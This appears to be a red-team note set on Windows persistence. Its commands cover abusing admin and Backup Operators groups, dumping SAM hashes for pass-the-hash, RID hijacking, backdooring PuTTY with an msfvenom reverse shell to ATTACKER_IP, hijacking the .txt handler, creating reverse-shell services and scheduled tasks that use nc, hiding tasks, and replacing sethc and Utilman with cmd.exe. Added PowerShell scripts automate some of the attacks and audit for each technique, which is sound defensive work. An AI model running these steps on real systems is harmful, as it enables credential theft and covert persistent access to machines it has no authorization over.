```powershell
# Add to the local Administrators group
net localgroup administrators oscar42 /add
# Add to Backup Operators: members can read and write any file (and save registry hives) regardless of DACLs
net localgroup "Backup Operators" oscar42 /add
# Allow WinRM / PowerShell remoting (this group does not grant RDP)
net localgroup "Remote Management Users" oscar42 /add
# LocalAccountTokenFilterPolicy=1 turns off UAC remote token filtering, so a local admin other than RID 500 gets a full token over the network
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 /f
```
Connect with Evil-WinRM and dump the local hashes
```bash
# Attacker: connect to the box
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
# In the session: confirm the group memberships
whoami /groups
# In the session: save the SYSTEM and SAM hives (needs Backup Operators or admin) and pull them back with Evil-WinRM's built-in download
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
# Attacker: dump hashes offline with Impacket
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
# Attacker: pass the hash with the Administrator NT hash (the part after the last colon of that secretsdump line)
evil-winrm -i 10.10.0.1 -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3
```
A user holding SeBackupPrivilege can read any file on the system, ignoring any DACL in place.
SeRestorePrivilege
A user holding SeRestorePrivilege can write any file on the system, ignoring any DACL in place.
```powershell
# Export the current local security policy
secedit /export /cfg config.inf
# Edit config.inf and append the user to both lines under [Privilege Rights]
#   SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
#   SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
# Build a database from the modified file and apply it
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
# To allow WinRM access (PowerShell remoting, not RDP): open the GUI, add oscar42 and grant Full Control
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
# You can now connect over WinRM
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
```
Both privileges sit in the token disabled until a program enables them: `reg save` and `robocopy /b` do that for you, a plain `copy` of a protected file does not.
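Added example, not part of the original notes: a PowerShell audit that parses a `secedit /export` file and reports any principal holding SeBackupPrivilege or SeRestorePrivilege beyond the default Administrators and Backup Operators groups. The expected-holder table and the inline sample export are assumptions; on a live host a user added as above shows up as its `*S-1-5-21-…` SID, which the helper resolves to a name where it can.

```powershell
# Audit holders of SeBackupPrivilege / SeRestorePrivilege (run from an elevated PowerShell).
# Baseline assumption: only Administrators (S-1-5-32-544) and Backup Operators (S-1-5-32-551) hold them.
$Expected = @{
    SeBackupPrivilege  = @('*S-1-5-32-544', '*S-1-5-32-551')
    SeRestorePrivilege = @('*S-1-5-32-544', '*S-1-5-32-551')
}

function Resolve-Sid {
    param([string]$Sid)
    # secedit writes SIDs with a leading '*'; names that fail to translate are returned as-is
    try { (New-Object System.Security.Principal.SecurityIdentifier($Sid.TrimStart('*'))).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }
}

function Get-PrivilegeHolders {
    param([string]$InfText)
    # Returns a hashtable: privilege name -> array of principals, from the [Privilege Rights] section
    $holders = @{}
    $inSection = $false
    foreach ($line in $InfText -split "`r?`n") {
        if ($line -match '^\[(.+)\]\s*$') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
        if (-not $inSection -or $line -notmatch '^\s*(\w+)\s*=\s*(.*)$') { continue }
        $holders[$Matches[1]] = @($Matches[2] -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
    }
    return $holders
}

function Find-UnexpectedHolders {
    param([hashtable]$Holders)
    foreach ($priv in $Expected.Keys) {
        foreach ($p in $Holders[$priv]) {          # iterates zero times when the privilege is absent
            if ($Expected[$priv] -notcontains $p) {
                [pscustomobject]@{ Privilege = $priv; Principal = $p; Resolved = (Resolve-Sid $p) }
            }
        }
    }
}

# Constructed sample export mirroring the edited config.inf above (not taken from a real host)
$sample = @"
[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeShutdownPrivilege = *S-1-5-32-544
"@
Find-UnexpectedHolders (Get-PrivilegeHolders $sample) | Format-Table -AutoSize

# Live check on this host: export only the user-rights area, parse it, clean up
$tmp = Join-Path $env:TEMP 'rights.inf'
secedit /export /cfg $tmp /areas USER_RIGHTS | Out-Null
Find-UnexpectedHolders (Get-PrivilegeHolders (Get-Content -Path $tmp -Raw)) | Format-Table -AutoSize
Remove-Item $tmp -ErrorAction SilentlyContinue
```

The sample run flags `oscar42` twice (once per privilege); the live run flags whichever extra SIDs the policy now carries. Baseline any legitimate backup agent account before treating a hit as persistence.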
Relative ID (RID) Hijacking
```powershell
# List the SIDs (and therefore RIDs) of all local users
wmic useraccount get name,sid
# Equivalent on hosts where wmic has been removed
Get-LocalUser | Select-Object Name, SID
```
Output:
```text
Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount      S-1-5-21-1966530601-3185510712-10604624-503
Guest               S-1-5-21-1966530601-3185510712-10604624-501
oscar42             S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount  S-1-5-21-1966530601-3185510712-10604624-504
```
The important bit is the last component of oscar42's SID, 1010. This is the RID. The built-in Administrator always has RID 500, and Windows builds the logon token from the RID stored in the SAM rather than from the account name, so we want to change oscar42's stored RID to 500.
```powershell
# Open regedit as SYSTEM using PsExec (HKLM\SAM is not readable even by administrators)
PsExec64.exe -i -s regedit
```
Now modify the key under HKLM\SAM\SAM\Domains\Account\Users\ for the user we want to elevate. The subkeys are named by RID in hex, zero-padded to eight digits: 1010 is 0x3F2, so oscar42's key is 000003F2 (Administrator's is 000001F4).
Inside that key, the binary F value holds the RID that Windows uses for the logon token, as a little-endian DWORD at offset 0x30. Change the bytes there from `F2 03` (0x3F2) to `F4 01` (0x1F4). The account name and password are untouched; the next logon as oscar42 produces a token carrying the Administrator RID.
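Added example, not part of the original notes: the same F-value edit done from PowerShell instead of by hand in regedit, plus the audit check a defender would run, which walks every user key under the SAM and reports any account whose key name (the real RID) disagrees with the RID stored in its F value. It must run as SYSTEM (for example `PsExec64.exe -i -s powershell.exe`); the account name `oscar42`, the target RID 500 and the use of `Get-LocalUser` to look up the current RID are assumptions.

```powershell
# RID hijack and RID-mismatch audit against the live SAM. Run as SYSTEM.
$UsersKey  = 'HKLM:\SAM\SAM\Domains\Account\Users'
$RidOffset = 0x30   # the RID is a little-endian DWORD at this offset inside the F value

function Get-SamUserKeyPath {
    param([string]$Name)
    # Look up the account's real RID from its SID and build the 8-digit hex key name
    $rid = [int](Get-LocalUser -Name $Name).SID.Value.Split('-')[-1]
    return ("$UsersKey\{0:X8}" -f $rid)
}

function Get-SamRid {
    param([string]$KeyPath)
    $f = (Get-ItemProperty -Path $KeyPath -Name F).F      # REG_BINARY comes back as byte[]
    return [BitConverter]::ToUInt32($f, $RidOffset)
}

function Set-SamRid {
    param([string]$KeyPath, [uint32]$NewRid)
    $f = (Get-ItemProperty -Path $KeyPath -Name F).F
    # GetBytes is little-endian on x86/x64, which matches how the SAM stores the value
    [Array]::Copy([BitConverter]::GetBytes($NewRid), 0, $f, $RidOffset, 4)
    Set-ItemProperty -Path $KeyPath -Name F -Value $f -Type Binary
}

function Find-RidMismatch {
    # Every account key is named after its RID; a hijacked account's F value says something else
    Get-ChildItem -Path $UsersKey | Where-Object { $_.PSChildName -match '^[0-9A-F]{8}$' } | ForEach-Object {
        $keyRid = [Convert]::ToUInt32($_.PSChildName, 16)
        $fRid   = Get-SamRid -KeyPath $_.PSPath
        if ($keyRid -ne $fRid) {
            [pscustomobject]@{ Key = $_.PSChildName; KeyRid = $keyRid; StoredRid = $fRid }
        }
    }
}

# Hijack: make oscar42's F value claim RID 500 (assumed account name and target)
$path = Get-SamUserKeyPath -Name 'oscar42'
'Before: 0x{0:X}' -f (Get-SamRid -KeyPath $path)
Set-SamRid -KeyPath $path -NewRid 500
'After:  0x{0:X}' -f (Get-SamRid -KeyPath $path)

# Audit: the 000003F2 key now reports a stored RID of 500
Find-RidMismatch | Format-Table -AutoSize
```

With the numbers from the listing above the two lines print `0x3F2` and then `0x1F4`. `Set-SamRid -KeyPath $path -NewRid 1010` puts the account back. `Find-RidMismatch` is the check worth scheduling: a clean host returns nothing, and a hit names the account key whose token RID has been tampered with.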
Backdooring Files
Using MSFVenom
```bash
# Inject a payload into PuTTY; -k keeps the original program working so the user sees nothing odd
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe
```
Hijacking File Extensions
File extensions are registered under HKLM\SOFTWARE\Classes\. Selecting the .txt extension there reveals its ProgId, txtfile. The command run when a file of that type is opened lives at HKLM\SOFTWARE\Classes\txtfile\shell\open\command.
Save the payload script to C:\Windows\System32\backdoor.ps1 and change that key's default value to `powershell -windowstyle hidden C:\Windows\System32\backdoor.ps1 %1` (the `%1` passes the clicked file's path to the script). Opening any .txt file will now execute our payload; to keep the user from noticing, the script should still open the file in Notepad itself, since the original handler no longer runs.
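Added example, not part of the original notes: the .txt handler hijack scripted end to end (write a payload script that still opens the file in Notepad, back up the original command, swap it), followed by the audit a defender would run over every ProgId in HKLM and HKCU looking for open commands that invoke a script host. The script path, the handler key and the list of suspicious hosts are assumptions; the payload line is left for the operator's own command.

```powershell
# .txt handler hijack plus a registry-wide audit of file-type handlers. Run elevated.
$Handler = 'HKLM:\SOFTWARE\Classes\txtfile\shell\open\command'
$Script  = 'C:\Windows\System32\backdoor.ps1'

# Payload script: open the file in Notepad so the user experience is unchanged, then do the attacker's work
@'
param([string]$Path)
Start-Process -FilePath notepad.exe -ArgumentList ('"{0}"' -f $Path)
# attacker payload goes here (reverse shell, beacon, ...)
'@ | Set-Content -Path $Script -Encoding ASCII

# Keep the original command so it can be restored, then point the handler at the script
$orig = (Get-ItemProperty -Path $Handler).'(default)'
Set-ItemProperty -Path $Handler -Name '(default)' `
    -Value ('powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "{0}" "%1"' -f $Script)
# Restore later with: Set-ItemProperty -Path $Handler -Name '(default)' -Value $orig

function Find-SuspiciousHandlers {
    # Any ProgId whose open command runs a script host or LOLBin is worth a look
    $hosts = 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32'
    foreach ($hive in 'HKLM:\SOFTWARE\Classes', 'HKCU:\SOFTWARE\Classes') {
        Get-ChildItem -Path $hive -ErrorAction SilentlyContinue | ForEach-Object {
            $cmdKey = Join-Path $_.PSPath 'shell\open\command'
            if (-not (Test-Path -Path $cmdKey)) { return }
            $cmd = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
            if ($cmd -match $hosts) {
                [pscustomobject]@{ Hive = $hive; ProgId = $_.PSChildName; Command = $cmd }
            }
        }
    }
}

Find-SuspiciousHandlers | Format-Table -AutoSize
```

The audit will always list a few legitimate ProgIds (for example the PowerShell, VBScript and JScript file types, whose handlers are script hosts by design), so baseline those; the `txtfile` hit, a document type handed to a hidden `powershell.exe`, is the kind of entry this check is for.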
Services
Auto change admin pass
A service that starts automatically runs its binary as SYSTEM at every boot, whether that binary resets the admin password to passwd123 or, as below, starts a reverse shell.
```bash
# Create a service-compatible reverse shell executable (exe-service wraps the payload in the SCM handshake)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
```
On the target machine:
```powershell
# After dropping the exe into C:\Windows\ (sc.exe needs the space after each "option=")
sc.exe create malService binPath= "C:\Windows\rev-svc.exe" start= auto
sc.exe start malService
```
Service hijacking
```powershell
# List all services; look for a stopped one to hijack, which avoids tripping AV that watches new service creation
sc.exe query state= all
# Query the configuration of a candidate service
sc.exe qc service1
# Point it at our binary, make it start at boot and run as LocalSystem
sc.exe config service1 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"
# Now either wait for the service to start on its own or start it manually
sc.exe start service1
```
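Added example, not part of the original notes: a PowerShell hunt for the kind of service the two sections above leave behind, one whose binary sits outside the Windows or Program Files trees, is unsigned or missing, or was dropped recently. The seven-day window and the "trusted directory" list are assumptions for illustration.

```powershell
# Flag services whose binary looks out of place. Run from an elevated PowerShell.
function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName is the raw command line: quoted or unquoted path followed by arguments
    if (-not $PathName) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Find-SuspiciousServices {
    param([int]$RecentDays = 7)
    # Assumed baseline: service binaries normally live under one of these roots
    $trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") | Where-Object { $_ -ne '\' }
    $cutoff  = (Get-Date).AddDays(-$RecentDays)
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $bin = Get-ServiceBinaryPath -PathName $_.PathName
        if (-not $bin) { return }
        $inTrusted = [bool]($trusted | Where-Object { $bin.StartsWith($_, 'OrdinalIgnoreCase') })
        $exists    = Test-Path -LiteralPath $bin
        $sig       = if ($exists) { (Get-AuthenticodeSignature -FilePath $bin).Status } else { 'Missing' }
        $created   = if ($exists) { (Get-Item -LiteralPath $bin).CreationTime } else { $null }
        $reasons = @()
        if (-not $inTrusted)                    { $reasons += 'binary outside Windows/Program Files' }
        if ($sig -ne 'Valid')                   { $reasons += "signature $sig" }
        if ($created -and $created -gt $cutoff) { $reasons += "binary created $($created.ToString('yyyy-MM-dd'))" }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Service   = $_.Name
                State     = $_.State
                StartMode = $_.StartMode
                RunsAs    = $_.StartName
                Binary    = $bin
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

Find-SuspiciousServices | Sort-Object Service | Format-Table -AutoSize
```

A freshly dropped, unsigned `C:\Windows\rev-svc.exe` is caught by the signature and creation-date tests even though it sits under a trusted root. An unquoted path with spaces resolves to a nonexistent first token and shows up as `signature Missing`, which is a finding in its own right, so leave those in rather than filtering them out.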
Task Scheduler
```powershell
# Create a task that connects back every minute as SYSTEM (must be created from an elevated prompt)
schtasks /create /sc minute /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
# Check that the task was created
schtasks /query /tn TaskBackdoor
```
Hide task
A task can be hidden from `schtasks /query` and the Task Scheduler GUI by deleting its security descriptor (SD): without one, the scheduler service refuses to show the task to any caller except SYSTEM. The descriptors live in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Select the key for the task you created and delete its SD value (this needs to be done as SYSTEM, e.g. via PsExec, since administrators cannot write there). The task keeps running, and its Tree and Tasks\{GUID} keys remain in the registry for anyone who looks there directly.
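Added example, not part of the original notes: a PowerShell check for exactly this trick. It walks the TaskCache\Tree keys, keeps the ones that correspond to real tasks (those with a matching entry under TaskCache\Tasks), and reports any whose SD value is gone, together with whether `Get-ScheduledTask` can still see it. The key paths are the documented locations above; everything else is illustrative.

```powershell
# List scheduled tasks whose Tree entry has no SD value. Run from an elevated PowerShell;
# from a SYSTEM shell the API also still lists them, which is why the registry is checked directly.
$Tree  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$Tasks = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'

function Find-HiddenTasks {
    Get-ChildItem -Path $Tree -Recurse | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath
        $id = $props.Id
        # Only real tasks have a matching Tasks\{Id} entry; folder keys under Tree do not
        if (-not $id -or -not (Test-Path -Path "$Tasks\$id")) { return }
        $taskPath = $_.PSPath -replace '^.*?\\TaskCache\\Tree', ''              # e.g. \TaskBackdoor
        $folder   = $taskPath.Substring(0, $taskPath.LastIndexOf('\') + 1)    # e.g. \  (API wants the trailing backslash)
        $hasSd    = $null -ne $props.PSObject.Properties['SD']
        $viaApi   = $null -ne (Get-ScheduledTask -TaskPath $folder -TaskName $_.PSChildName -ErrorAction SilentlyContinue)
        if (-not $hasSd) {
            $detail = Get-ItemProperty -Path "$Tasks\$id"
            [pscustomobject]@{
                Task        = $taskPath
                Id          = $id
                Author      = $detail.Author
                ListedByApi = $viaApi
            }
        }
    }
}

Find-HiddenTasks | Format-Table -AutoSize
```

On a clean host this returns nothing. After the SD deletion above it lists `\TaskBackdoor` with `ListedByApi` false when run as an administrator, which is the discrepancy to alert on; the task's command line is still recoverable from the same Tasks\{GUID} key's Actions value.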
Logon Triggered Persistence
Startup Folder
```powershell
# Anything placed here runs at logon for every user
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
# Per-user equivalent (runs only when that user logs on)
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
```
Registry
```powershell
# Run key: create a REG_EXPAND_SZ (or REG_SZ) value whose data is the path to the executable
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Winlogon: append the exe path after the comma in the Userinit value, keeping userinit.exe first
#   Userinit = C:\Windows\system32\userinit.exe,C:\path\to\backdoor.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
# Logon script: add a value named UserInitMprLogonScript whose data is the path to the exe
HKCU\Environment
```
Logon Screen
Sticky Keys
```powershell
# Take ownership of sethc.exe, grant yourself full control, then replace it with cmd.exe
takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
# Pressing Shift five times at the lock screen now pops a SYSTEM shell
```
Utilman
```powershell
# Same trick with the Ease of Access helper
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Administrator:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
# Clicking the accessibility button at the logon screen now pops a SYSTEM shell
```
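Added example, not part of the original notes: one PowerShell audit covering the logon-triggered locations from the previous section (Run/RunOnce keys, Winlogon Userinit and Shell, UserInitMprLogonScript, both startup folders) and the accessibility binaries this section replaces. The Winlogon defaults are assumed to be the stock Windows 10 values; the list of accessibility binaries is an assumption too.

```powershell
# Logon persistence and accessibility-binary audit. Run from an elevated PowerShell.
$Winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$Defaults = @{ Userinit = 'C:\Windows\system32\userinit.exe,'; Shell = 'explorer.exe' }   # assumed stock values
$RunKeys  = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$StartupDirs = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
)
$AccessibilityBins = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe'
$PsProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Find-LogonPersistence {
    # Every Run/RunOnce value: these are not inherently bad, so the output is a list to review
    foreach ($k in $RunKeys) {
        $p = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if ($p) {
            $p.PSObject.Properties | Where-Object { $_.Name -notin $PsProps } |
                ForEach-Object { [pscustomobject]@{ Where = $k; Name = $_.Name; Value = $_.Value } }
        }
    }
    # Winlogon values that differ from the stock defaults (an appended path after the comma shows up here)
    $wl = Get-ItemProperty -Path $Winlogon
    foreach ($name in $Defaults.Keys) {
        if ($wl.$name -ne $Defaults[$name]) {
            [pscustomobject]@{ Where = $Winlogon; Name = $name; Value = $wl.$name }
        }
    }
    # UserInitMprLogonScript should not exist on a normal workstation
    $envKey = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
    if ($envKey.UserInitMprLogonScript) {
        [pscustomobject]@{ Where = 'HKCU:\Environment'; Name = 'UserInitMprLogonScript'; Value = $envKey.UserInitMprLogonScript }
    }
    # Anything in the startup folders besides desktop.ini
    foreach ($d in $StartupDirs) {
        Get-ChildItem -Path $d -File -ErrorAction SilentlyContinue | Where-Object { $_.Name -ne 'desktop.ini' } |
            ForEach-Object { [pscustomobject]@{ Where = $d; Name = $_.Name; Value = $_.FullName } }
    }
}

function Find-SwappedAccessibilityBinaries {
    # A copied cmd.exe is still Microsoft-signed, so compare hashes and the PE's OriginalFilename, not just the signature
    $cmdHash = (Get-FileHash -Path "$env:SystemRoot\System32\cmd.exe").Hash
    foreach ($b in $AccessibilityBins) {
        $path = "$env:SystemRoot\System32\$b"
        if (-not (Test-Path -Path $path)) { continue }
        $findings = @()
        if ((Get-FileHash -Path $path).Hash -eq $cmdHash)   { $findings += 'is a byte-for-byte copy of cmd.exe' }
        $orig = (Get-Item -Path $path).VersionInfo.OriginalFilename
        if ($orig -and $orig -ne $b)                         { $findings += "OriginalFilename is $orig" }
        $sig = (Get-AuthenticodeSignature -FilePath $path).Status
        if ($sig -ne 'Valid')                                { $findings += "signature $sig" }
        if ($findings.Count -gt 0) { [pscustomobject]@{ Binary = $b; Findings = ($findings -join '; ') } }
    }
}

Find-LogonPersistence | Format-Table -AutoSize
Find-SwappedAccessibilityBinaries | Format-Table -AutoSize
```

After the `copy` above, `sethc.exe` is reported as a copy of `cmd.exe` with `OriginalFilename is Cmd.Exe` while its Authenticode status still reads `Valid`, which is why the signature alone is not a sufficient check for this technique.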